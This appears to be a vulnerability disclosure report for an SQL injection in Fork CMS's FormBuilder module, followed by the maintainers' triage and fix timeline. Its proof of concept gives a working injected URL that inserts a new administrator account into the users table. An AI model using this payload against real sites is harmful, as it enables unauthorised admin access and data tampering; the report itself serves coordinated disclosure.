SQL Injection in forkcms/forkcms

Valid

Reported on

Oct 30th 2021

Description

When deleting submissions which belong to a formular (made with module FormBuilder), the parameter id[] is vulnerable for SQL injection.

Proof of Concept

  • Call the URL
http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete
  • To test this URL successfully, you need a valid formular and some submissions to that formular. You might have to adjust the parameter form_id to another value.
  • After calling this URL, you have a new entry in users table.

Impact

The attacker can tamper data in the database as they want.

We have contacted a member of the forkcms team and are waiting to hear back 7 months ago
We have sent a follow up to the forkcms team. We will try again in 7 days. 7 months ago
We have sent a second follow up to the forkcms team. We will try again in 10 days. 6 months ago
We have sent a third and final follow up to the forkcms team. This report is now considered stale. 6 months ago
Jelmer Prins has invalidated this vulnerability 5 months ago

csrf token fails and blocks this

The disclosure bounty has been dropped
The fix bounty has been dropped
Jelmer Prins
5 months ago

sorry, I was wrong, it is valid, I'll ask to reopen this one

Jamie Slome
5 months ago

Admin

Re-opened! ♥️

Jelmer Prins validated this vulnerability 5 months ago
starkitsec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jelmer Prins
2 months ago

fix is currently in review

Jelmer Prins confirmed that a fix has been merged on 7a1204 2 months ago
Jelmer Prins has been awarded the fix bounty
to join this conversation